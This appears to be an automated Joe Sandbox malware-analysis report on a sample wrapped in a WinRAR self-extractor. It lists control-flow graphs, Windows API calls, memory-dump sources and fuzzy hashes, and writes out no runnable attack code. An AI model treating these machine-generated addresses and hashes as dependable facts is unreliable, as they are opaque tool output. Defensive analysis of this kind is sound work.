                                                                                                                control_flow_graph 1432 22911ee-229125f call 22918a1 1435 22913af-22913e1 NtReadFile 1432->1435 1436 2291265-2291280 1432->1436 1437 2291562-2291576 call 229f2be 1435->1437 1438 22913e7-22913e9 1435->1438 1442 229128c-2291299 1436->1442 1443 2291282-229128a 1436->1443 1438->1437 1441 22913ef-2291427 1438->1441 1445 22914d8-22914e2 1441->1445 1446 229142d-2291439 1441->1446 1447 229129d-22912a7 1442->1447 1443->1447 1448 229150a-229150f 1445->1448 1449 22914e4 1445->1449 1450 229143d-2291449 1446->1450 1452 22912a9-22912c1 1447->1452 1453 2291306-229131d 1447->1453 1448->1437 1451 2291511-229155c NtSetInformationFile 1448->1451 1454 22914ea-22914ec 1449->1454 1455 22914e6-22914e8 1449->1455 1456 229144b 1450->1456 1457 22914af-22914be 1450->1457 1451->1437 1461 22913ab 1452->1461 1462 22912c7-22912cc 1452->1462 1470 229131f-229132f 1453->1470 1471 2291331-2291342 1453->1471 1454->1448 1458 22914ee-2291507 call 22a0050 1454->1458 1455->1448 1455->1454 1459 229144d-229144f 1456->1459 1460 2291451-2291457 1456->1460 1457->1450 1463 22914c4-22914c6 1457->1463 1458->1448 1459->1457 1459->1460 1460->1457 1465 2291459 1460->1465 1461->1435 1466 22912ce-22912d0 1462->1466 1467 22912d6-22912ec 1462->1467 1463->1450 1468 22914cc-22914d4 1463->1468 1473 229145b-2291461 1465->1473 1474 2291463-22914ab call 229f4d0 * 2 1465->1474 1466->1461 1466->1467 1467->1461 1475 22912f2 1467->1475 1468->1445 1476 2291348-229137d 1470->1476 1471->1476 1473->1457 1473->1474 1474->1457 1478 22912fc-2291301 1475->1478 1479 22912f4-22912f6 1475->1479 1476->1461 1480 229137f 1476->1480 1478->1461 1479->1461 1479->1478 1482 229138c-2291390 1480->1482 1483 2291381-229138a 1480->1483 1482->1461 1485 2291392 1482->1485 1483->1461 1483->1482 1487 229139a-22913a6 1485->1487 1488 2291394-2291398 1485->1488 1487->1461 1488->1461 1488->1487
                                                                                                                APIs
                                                                                                                  • Part of subcall function 022918A1: RtlEnterCriticalSection.NTDLL(022E4024), ref: 022918AB
                                                                                                                  • Part of subcall function 022918A1: RtlLeaveCriticalSection.NTDLL(022E4024), ref: 022918E0
                                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 022913D3
                                                                                                                • __allrem.LIBCMT ref: 02291469
                                                                                                                • __allrem.LIBCMT ref: 02291491
                                                                                                                • NtSetInformationFile.NTDLL(?,?,?,00000008,0000000E), ref: 0229155C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalFileSection__allrem$EnterInformationLeaveRead
                                                                                                                • String ID: 0L{$kL
                                                                                                                • API String ID: 3056675614-2482176762
                                                                                                                • Opcode ID: 0d1d881a45d6545452623fa6c0eba49551a098732ccfcf98f998de2206135554
                                                                                                                • Instruction ID: 25e3d83f9c250a3e930a26916bd94b67ed21aa093ed87c37e3f2e804aaa1abb8
                                                                                                                • Opcode Fuzzy Hash: 0d1d881a45d6545452623fa6c0eba49551a098732ccfcf98f998de2206135554
                                                                                                                • Instruction Fuzzy Hash: 30B18771A58342DFCB10CFA9D884A6ABBF1BBC9304F04491DF99997348D770E864CB86
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004093E7
                                                                                                                  • Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
                                                                                                                  • Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
                                                                                                                  • Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E
                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,00000800), ref: 00409417
                                                                                                                • GetLastError.KERNEL32(?,?,00000800), ref: 00409421
                                                                                                                • GetLastError.KERNEL32(000000FF,?), ref: 00409459
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileFindFirstLast$_wcscpy_wcslen_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 208496615-0
                                                                                                                • Opcode ID: cebcceb43910dc4115f7d404cdd30f868bf379ffd75f27eb529d56c97cebf74b
                                                                                                                • Instruction ID: 4aa6cb4bef7fcbfd161077f23712da366d19d4f9968ffeb5f4cd169760b85fcb
                                                                                                                • Opcode Fuzzy Hash: cebcceb43910dc4115f7d404cdd30f868bf379ffd75f27eb529d56c97cebf74b
                                                                                                                • Instruction Fuzzy Hash: DA415F71500658ABCB30DF28CC84BDAB7F8AF08350F1045AAF5AEE6291D774AEC1CB54
                                                                                                                APIs
                                                                                                                • GetSystemInfo.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,02291FA0,00000000,?), ref: 02291E2D
                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000,?,?,?,?,?,?,?,?,02291FA0,00000000,?), ref: 02291E55
                                                                                                                • VirtualAlloc.KERNEL32(?,0000006C,00003000,00000020), ref: 02291E90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$AllocInfoQuerySystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 823228801-0
                                                                                                                • Opcode ID: 53091006a363010ef4c0ce2d728dd050c796fe6f75e8149d841c03ca84b2b03c
                                                                                                                • Instruction ID: 51e679f85a04b0bd1ba94b2293fea9053b7233d255ebbc53cf993fd7eb13b77e
                                                                                                                • Opcode Fuzzy Hash: 53091006a363010ef4c0ce2d728dd050c796fe6f75e8149d841c03ca84b2b03c
                                                                                                                • Instruction Fuzzy Hash: 5321F732A543068FEB05DEE6D88875AB3EEAB88304F110C3DE58AC7184D7F5D869C701
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00001000,00000004), ref: 004D1009
                                                                                                                • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 004D102F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryVirtual$AllocateFree
                                                                                                                • String ID:
                                                                                                                • API String ID: 292159236-0
                                                                                                                • Opcode ID: e7b345b912f126f178e2541447047507b5197e83b236eb501eecb7dba1514627
                                                                                                                • Instruction ID: 4ccaec625d17c4f065e5932546898ee997b503673f8cd146e4b71856a3390186
                                                                                                                • Opcode Fuzzy Hash: e7b345b912f126f178e2541447047507b5197e83b236eb501eecb7dba1514627
                                                                                                                • Instruction Fuzzy Hash: 35F0FF75940248FBDB10DF94C859BED77B4EB04760F208295E920A62D0D7B46A84CB95
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0041742C
                                                                                                                  • Part of subcall function 0041720E: __EH_prolog.LIBCMT ref: 00417213
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1619290041-0
                                                                                                                • Opcode ID: 79dd8a3aeb653383c2a714cbb444127f8573c188ea481f85f5fc91de35f7538f
                                                                                                                • Instruction ID: 3eb4abe1162c79405747c8457d9548ee8fc3b97d27ef5f476af8528d47a403d6
                                                                                                                • Opcode Fuzzy Hash: 79dd8a3aeb653383c2a714cbb444127f8573c188ea481f85f5fc91de35f7538f
                                                                                                                • Instruction Fuzzy Hash: D592C370A087859FCB29CF34C4D06E9BBF1AF55308B18C49ED8968B352D738E985CB59
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e6b0376bbcdfdaaf0b5895f3f32c5749065beb5c8c17e5f97fff5aacc2fd95cf
                                                                                                                • Instruction ID: 406a576274826a1d078d48897a2511a6fd14e8948a0ea3d968b390d4a4adaa8c
                                                                                                                • Opcode Fuzzy Hash: e6b0376bbcdfdaaf0b5895f3f32c5749065beb5c8c17e5f97fff5aacc2fd95cf
                                                                                                                • Instruction Fuzzy Hash: 3331C632908219AFCB22DF58C94169EB3E5BF80704F54881FE599D7302E738AD199B87
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0229113E
                                                                                                                  • Part of subcall function 02291908: RtlEnterCriticalSection.NTDLL(022E4024), ref: 02291911
                                                                                                                  • Part of subcall function 02291908: RtlLeaveCriticalSection.NTDLL(022E4024), ref: 0229195F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$CreateEnterFileLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 2623862156-0
                                                                                                                • Opcode ID: 5ded528eb0fdd7aa0fafbd9923a4ac878af61844773285ed85887521e808fea4
                                                                                                                • Instruction ID: d2b998cac163796f871534ed9eb69bc63b84f7fa9a2cd3179e563d65bb15a176
                                                                                                                • Opcode Fuzzy Hash: 5ded528eb0fdd7aa0fafbd9923a4ac878af61844773285ed85887521e808fea4
                                                                                                                • Instruction Fuzzy Hash: A7F01D36109305BF9B015E86EC40D5BBBBAEFC93A5F50482EFA9442220C773E921DF21
                                                                                                                APIs
                                                                                                                • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004D1056
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3963845541-0
                                                                                                                • Opcode ID: 50c05400395a03b20e06351691fae088d68361488e0ef6a240dc2bda2501699c
                                                                                                                • Instruction ID: 3cd09412aefe593d431108f44592f772c0f6e448ed39dc29f5e7d1df07b74fea
                                                                                                                • Opcode Fuzzy Hash: 50c05400395a03b20e06351691fae088d68361488e0ef6a240dc2bda2501699c
                                                                                                                • Instruction Fuzzy Hash: E5D0A97200420CBBCB00CB80DC05FEA77ACE704330F200389B928821C0EAB02A088BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6f81396d29097eea4873f774319d7cc3e9b42b0bda2001242bb644105d1b2ab6
                                                                                                                • Instruction ID: 0869d0174583789ed42055ae73e587f08cdd3c9ddba986da3f1ae38dae155aae
                                                                                                                • Opcode Fuzzy Hash: 6f81396d29097eea4873f774319d7cc3e9b42b0bda2001242bb644105d1b2ab6
                                                                                                                • Instruction Fuzzy Hash: E2D0C9F4C093009EC700EF24D58492AFBF4AA96600F00A81DF888A3200D230D8489B66

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 40f34c-40f37f call 419784 call 419e00 call 405ffb 7 40f381-40f384 0->7 8 40f389-40f392 0->8 9 40fbc4-40fbd1 7->9 10 40f398-40f399 8->10 11 40f91b-40f92e 8->11 12 40f3aa-40f3ac 10->12 13 40f39b-40f3a0 10->13 14 40f930-40f939 SendMessageW 11->14 15 40f93f-40f946 11->15 20 40fbc3 12->20 16 40f3a2-40f3a3 13->16 17 40f40b-40f427 call 4ebf1c 13->17 14->15 18 40f958-40f9a3 call 40d894 GetDlgItem SendMessageW call 419298 GetDlgItem 15->18 19 40f948-40f952 call 458cec 15->19 23 40f3e3-40f3f0 16->23 24 40f3a5-40f3a8 16->24 35 40f429-40f42f 17->35 36 40f43c-40f442 17->36 49 40f9a5 18->49 50 40f9ab-40f9de call 4e8e64 call 4192af call 40f142 18->50 31 40f957 19->31 20->9 27 40f3f2-40f3f8 23->27 28 40f3fe 23->28 24->12 30 40f3b1-40f3c8 call 40c05e call 40501d 24->30 27->28 33 40fbc0-40fbc2 27->33 34 40f3ff-40f406 call 45b1e8 28->34 30->33 57 40f3ce-40f3de SetDlgItemTextW 30->57 31->18 33->20 34->33 42 40f431 35->42 43 40f438-40f43a 35->43 38 40f453-40f465 GetDlgItem 36->38 39 40f444-40f44e 36->39 47 40f467-40f488 SendMessageW * 2 38->47 48 40f48d-40f49c call 4ecc60 38->48 46 40f8a2-40f8a8 39->46 42->43 43->34 55 40f8aa-40f8b0 46->55 56 40f90c-40f90e call 45b1e8 46->56 47->48 62 40f4aa-40f4f1 call 410823 call 40da51 call 40c05e call 40b8bd 48->62 63 40f49e-40f4a8 call 40c05e 48->63 49->50 82 40f9e0-40f9e9 call 40e51e 50->82 83 40f9ee-40f9f4 50->83 55->56 61 40f8b2-40f8d4 call 40c05e SetDlgItemTextW 55->61 64 40f913 56->64 57->33 75 40f8d6-40f8db 61->75 76 40f8dd-40f8e9 61->76 77 40f4f7-40f504 call 40cfaa 62->77 63->77 68 40f914-40f916 64->68 68->20 80 40f8ef-40f90a call 40c05e * 2 call 45f9d0 75->80 76->80 96 40f512-40f524 call 4092a1 77->96 97 40f506-40f50d call 40d75f 77->97 80->68 82->83 90 40fa84-40fa90 83->90 91 40f9fa-40fa08 83->91 92 40fab2-40fab8 90->92 93 40fa92-40fab0 call 40c05e SetDlgItemTextW call 40c05e SetDlgItemTextW 90->93 94 40fa0b-40fa0e 91->94 104 40fb4e-40fb55 92->104 105 40fabe-40fac6 call 40e51e 92->105 93->92 101 40fa10-40fa16 94->101 102 40fa18-40fa1f 94->102 123 40f526-40f52f GetLastError 96->123 124 40f53a-40f54b call 419285 96->124 97->96 101->102 110 40fa53-40fa5d 101->110 111 40fa21-40fa27 102->111 112 40fa29-40fa52 call 419a9d call 40c05e call 419a9d 102->112 115 40fb61-40fb67 104->115 116 40fb57-40fb60 call 4de778 104->116 121 40facb-40fad2 105->121 110->94 125 40fa5f-40fa65 110->125 111->110 111->112 112->110 126 40fb69-40fb76 call 405fb8 * 2 115->126 127 40fb7b-40fb82 115->127 116->115 132 40fad4-40fada 121->132 133 40faff-40fb06 121->133 135 40f531-40f534 123->135 136 40f536 123->136 149 40f55c-40f562 124->149 150 40f54d-40f556 GetLastError 124->150 125->90 137 40fa67-40fa7f call 41909a 125->137 126->127 128 40fb84-40fb8a 127->128 129 40fba8-40fbae 127->129 128->129 142 40fb8c-40fb98 128->142 129->33 144 40fbb0-40fbbe call 40c05e SetDlgItemTextW 129->144 132->133 145 40fadc-40fafe call 41909a call 4197a3 132->145 140 40fb40-40fb49 call 40e51e 133->140 141 40fb08-40fb16 call 4cb628 133->141 135->124 135->136 136->124 137->90 140->104 141->140 169 40fb18-40fb1e 141->169 152 40fba2-40fba7 call 457008 142->152 153 40fb9a-40fba0 SendMessageW 142->153 144->33 145->133 161 40f564-40f567 149->161 162 40f5cc-40f5cf 149->162 150->149 159 40f558 150->159 152->129 153->129 159->149 170 40f5e0-40f5ea 161->170 171 40f569-40f5ac GetTickCount call 40b8bd call 408713 call 40888d 161->171 167 40f7d5-40f81d call 405fd6 * 2 call 405fb8 call 405fd6 SetDlgItemTextW GetDlgItem 162->167 168 40f5d5-40f5db 162->168 212 40f839-40f874 call 40e51e * 2 call 40dfc2 call 40e51e 167->212 213 40f81f-40f838 call 4e4368 call 472738 167->213 168->170 175 40f5dd 168->175 169->140 178 40fb20-40fb3a DialogBoxParamW 169->178 176 40f5f0-40f694 call 4d88f8 call 40cbab call 40b8bd call 4691c8 170->176 177 40f778-40f7d0 call 40c05e call 40b8bd call 406238 call 40c05e call 45f9d0 170->177 205 40f5bd-40f5c7 call 408bcf 171->205 206 40f5ae-40f5b7 GetLastError 171->206 175->170 215 40f699-40f69f 176->215 178->42 178->140 205->162 206->205 210 40f5b9 206->210 210->205 249 40f894-40f89c call 405fb8 212->249 250 40f876-40f87c 212->250 213->212 219 40f6a1-40f6a9 call 45ac80 215->219 220 40f708-40f738 call 44dc7c call 40cb60 * 2 215->220 233 40f6bb-40f707 call 40cdba * 3 call 4e7950 call 41b4f0 call 4dcd00 219->233 234 40f6ab-40f6b6 call 410823 219->234 245 40f73a-40f75b call 452924 call 44ef00 220->245 246 40f75d 220->246 233->220 234->233 253 40f761-40f764 245->253 246->253 249->46 250->249 254 40f87e-40f884 250->254 258 40f766-40f769 CloseHandle 253->258 259 40f76f-40f772 253->259 254->249 260 40f886-40f88f call 40e51e 254->260 258->259 259->28 259->177 260->249
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$2C$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$lB$tfB$winrarsfxmappingfile.tmp$jB
                                                                                                                • API String ID: 3519838083-846196756
                                                                                                                • Opcode ID: 61406df2615012d9e3db60e997fd6fce66c4b730de3811abe328324a049bd3c4
                                                                                                                • Instruction ID: 1738a3ab06a0cb19fef92cc5e8e1081d7c2227203200a283704730c506bb817e
                                                                                                                • Opcode Fuzzy Hash: 61406df2615012d9e3db60e997fd6fce66c4b730de3811abe328324a049bd3c4
                                                                                                                • Instruction Fuzzy Hash: 9622CFB1641258BAEB30FB619C82FEF3668AF01708F40407BF604B65D2D77D4A498B6D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 271 40e51e-40e536 call 419784 call 419e00 276 40f0fb-40f106 271->276 277 40e53c-40e562 call 40d454 271->277 277->276 280 40e568-40e56b 277->280 281 40e570-40e58a 280->281 282 40e591-40e5a4 call 40d98b 281->282 285 40e5a6 282->285 286 40e5aa-40e5c2 call 41154c 285->286 289 40e5d2-40e5d6 286->289 290 40e5c4-40e5cb 286->290 291 40f0cc-40f0f2 call 40d454 289->291 292 40e5dc-40e5df 289->292 290->286 293 40e5cd 290->293 291->281 304 40f0f8-40f0fa 291->304 295 40e5e6-40e5ea 292->295 296 40e7cd-40e7d1 292->296 297 40e88e-40e892 292->297 298 40e86f-40e873 292->298 293->291 295->291 300 40e5f0-40e65a call 419298 call 409ea3 call 409376 call 40939f call 406528 call 409551 295->300 296->291 303 40e7d7-40e7e6 296->303 297->291 302 40e898-40e8a0 297->302 298->291 301 40e879-40e889 call 4e8e64 298->301 368 40e660 300->368 369 40e7b9-40e7c8 call 40938c 300->369 301->291 302->291 307 40e8a6-40e8c0 302->307 308 40e7f5-40e7f9 303->308 309 40e7e8-40e7f4 call 419a9d 303->309 304->276 312 40e8c2-40e8c8 307->312 313 40e8cb-40e8d4 call 419a83 307->313 315 40e803-40e80b call 40d600 308->315 316 40e7fb-40e801 308->316 309->308 312->313 313->291 330 40e8da-40e8e1 313->330 320 40e80d-40e811 315->320 316->320 323 40e813-40e815 320->323 324 40e817-40e823 call 419a83 320->324 327 40e825-40e849 call 419a83 call 419831 323->327 324->327 353 40e850-40e85d call 419a9d 327->353 354 40e84b-40e84d 327->354 334 40e8e3-40e8e8 330->334 335 40e8fd-40e901 330->335 334->335 340 40e8ea-40e8f1 334->340 336 40e9e2 335->336 337 40e907-40e90a 335->337 346 40e9e3-40e9ea call 419acb 336->346 342 40e917-40e931 call 4d7bd8 337->342 343 40e90c-40e911 337->343 340->291 341 40e8f7-40e8f8 340->341 341->346 357 40e933-40e96d call 471e1c call 4d3f54 342->357 358 40e97c-40e984 342->358 343->336 343->342 351 40e9ef-40e9f0 346->351 356 40e9f1-40ea03 call 41bdc2 351->356 353->291 373 40e863-40e86a call 4197a3 353->373 354->353 377 40ea11-40ea5f call 419acb call 40d7e9 GetDlgItem call 4e8e64 SendMessageW call 419a4c 356->377 378 40ea05-40ea0a 356->378 397 40e972-40e974 357->397 398 40e96f 357->398 364 40e9b1-40e9cf call 419a83 * 2 358->364 365 40e986-40e99c call 419a83 358->365 364->356 404 40e9d1-40e9e0 call 419a9d 364->404 365->364 383 40e99e-40e9b0 call 419a9d 365->383 376 40e665-40e67b SetFileAttributesW 368->376 369->291 373->291 384 40e681-40e6b5 call 40a544 call 409e73 call 419a83 376->384 385 40e723-40e72f GetFileAttributesW 376->385 424 40ea64-40ea68 377->424 378->377 386 40ea0c-40ea0e 378->386 383->364 421 40e6b7-40e6c7 call 419a83 384->421 422 40e6c9-40e6d7 call 409e2d 384->422 393 40e731-40e740 DeleteFileW 385->393 394 40e79d-40e7b3 call 409551 385->394 386->377 393->394 402 40e742-40e746 393->402 394->369 394->376 397->358 398->397 407 40e74e-40e772 call 40b8bd GetFileAttributesW 402->407 404->351 418 40e774-40e78a MoveFileW 407->418 419 40e748-40e74b 407->419 418->394 423 40e78c-40e79c call 4e7ae4 418->423 419->407 421->422 432 40e6dd-40e722 call 419a83 call 419b00 call 46fd0c 421->432 422->369 422->432 423->394 424->291 428 40ea6e-40ea83 SendMessageW 424->428 428->291 432->385
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
